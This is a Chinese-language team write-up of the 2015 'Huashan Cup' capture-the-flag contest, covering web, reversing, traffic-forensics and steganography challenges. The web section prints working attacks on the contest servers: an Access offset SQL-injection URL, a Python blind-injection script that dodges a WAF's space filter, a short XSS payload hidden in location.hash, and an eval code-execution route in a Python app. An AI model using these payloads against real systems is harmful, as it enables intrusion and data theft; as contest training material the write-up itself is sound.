中国 • 西安2015 “华山杯” 网络安全技能大赛-WRITEUP

中国 • 西安2015 “华山杯” 网络安全技能大赛-WRITEUP

【Bigtang iiiiiiii bssh3lll】

###Web渗透

####1 怎么在Web上Ping呢 100 Ping; Biu~Biu~Biu~
题目说是利用web发起ping请求,访问flag.php,reponse包里有个key:DDos,一开始想到前段时间wp,xmlrpc pingback导致的ddos的问题,尝试无果,后来想到html5之后a标签设置链接可以附加一个ping属性,于是
1446378133210.png

访问抓包即可得到flag
1446378151657.png

####2 社工库查询 150 社工可以干什么呢
看题目,是一个社工库网站,提示是“可以查到西瓜大神的信息哦”,最开始以为是要求社工到西瓜的 QQ 号码,输入了发现没有结果。以为是要暴力 QQ 号,用Burp从 10000-99999999 跑了下,刚开始就发现 10000 的返回长度不一样。打开发现提示 intval:
web02_01.png
故而 10000.1 获取 flag。

####3 Access注入 200 想办法注入出Key
常规 access 注入,发现暴力跑出的表名不全,通过 access 偏移注入获取 flag:

http://218.245.4.113:8888/web03/ca55022fa7ae5c29d179041883fe1556/index.asp?id=-1 union select 1,2,3,4,* from admin as a inner join admin as b on a.id=b.id 

web03_01.png

####4 有WAF该怎么注入呢 300 注入注入Injection!!!
盲注,过滤空格和一些函数,手查猜到是 flag.flag,编写如下 Python 脚本自动化:

import string
import requests 

chars = string.printable.strip()

ori_url = "http://218.245.4.113:8080/web04/60c2a013a6decbe0c5c2883080e6b332/index.php?id=(select%a0ord(mid(flag,{},1))={}%a0from%a0flag)"

flag = ""

for i in range(1, 31):
    for char in chars:
        url = ori_url.format(i, ord(char))
        try:
            resp = requests.get(url, timeout=5)
            resp.close()
            # print char, len(resp.content)
            if len(resp.content) > 400:
                print "[+]{} ----> {}".format(i, char)
                flag += char
                break
        except:
            pass
    else:
        print "[!]{} timeout, fill with [^]".format(i)
        flag += "^"

print flag

####5 XSS??? XSS!!! 400 我×我×我×××
输出在属性中,通过闭合属性进行XSS,后面的 " 通过html实体编码绕过。过滤空格和关键字,为了绕过和缩短长度,将 Payload 放入 location.hash 中。最终Payload 如下(26字节):

http://218.245.4.113:8080/web05/df1014aa2d59e1a02bba52955f797c7d/xss.php?xss=%22Oncut=outerHTML=URL,%26quot#<iframe/onload=alert(1)></iframe>

####6 Python-Web 500 这是一个Python的Web程序
手动改包后发现了应用的debug信息,
web06_01.jpg

知道了代码流程就简单了,通过指定 obj -> builtins,method -> eval 达到代码执行的目的,随后开始翻文件,终于在 settings.py 中找到了 flag

###逆向破解
####1 逆向破解-1 100 逆向分析提交key
调试时中发现半块西瓜皮的id,放到框框里就出flag了

####2 逆向破解-2 200 逆向分析提交分析过程
crack1在js里面
1446378248028.png

crack2在401000断下,稍微跟一下就看见了
1446379405359.png

Bigtang 1829 4619182

####3 逆向破解-3 300 逆向分析提交分析过程
补墙游戏http://www.3366.com/flash/103139.shtml
9*9 界面 初始状态
01 01 00 01 01 01 00 01 01
01 00 00 00 00 00 00 00 01
01 00 00 00 00 0C 16 00 01
01 20 00 00 00 2A 00 00 01
00 00 00 00 00 00 00 00 00
01 00 00 34 00 00 00 00 01
00 00 00 00 00 00 3E 00 00
01 48 00 00 52 00 00 00 01
01 01 00 01 01 01 01 00 01

sn的奇数位取值1-8
1 -> 0C 2 -> 16 3 -> 20 4 -> 2A
5 -> 34 6 -> 3E 7 -> 48 8 -> 52

sn的偶数位取值1-4
1 左 2 右 3 上 4 下

sn:5134314144425451628184141113237274

####4 逆向破解-4 500 逆向分析提交分析过程
未完成

###网络取证
####1 流量分析1 150 来当网管吧
看提示说是大学里的ip所以注重分析222开头ip的包,又说到穿透防火墙的方式,显示看到dns协议,发现都是正常的dns查询,注意到几个ICMP的包,于是想到曾有文章讲到利用icmp协议去躲避防火墙的监控和过滤,用向下键快速查看时,发现有一位字母在变化
1446378308506.png

1446378329183.png

1446378341035.png

于是拼凑一下得到flag

####2 扫雷 250 来一起玩扫雷吧
直接把zip文件丢上去
http://www.osronline.com/page.cfm?name=analyze
在strings用ctrl+f搜索flag
1446381057992.png

####3 流量分析2 400 再来当一把网管吧
ftp里看到一个rar和tcp里看到一个pass.txt
rar的密码是pass里的base64解密出来的“一枝红杏出墙来”。

####4 Hack-Team 500 核武武器库中貌似有问题
用Eassos PartitionGuru Professional恢复出来doc,pdf
pdf的密码就是tips的里“梅花香自苦寒来”的拼音!!!

###密码&算法
####1 密码算法分析 100 来根据密码推导算法吧
未完成

####2 图片隐写 200 获取信息,提交key
jpg结尾ffd9,有个被破坏的rar文件,抠出来。rar的密码在其中一个未加密的图片里。解出来64个文件,每个文件37字节。
每个一行,是个二维码的样子,截图,缩小,扫一扫。
1446382045692.png

####3 图片隐写2 300 获取信息,提交key
binwalk出来一个tiff,winhex抠出来放到ps里看到26张隐藏的图层
1446381698118.png
密钥三三一组得出flag

####4 魔塔AI编写 500 骚年,快去拯救小怪兽
未完成

tagged by none  

Comment Closed.

© 2014 ::L Team::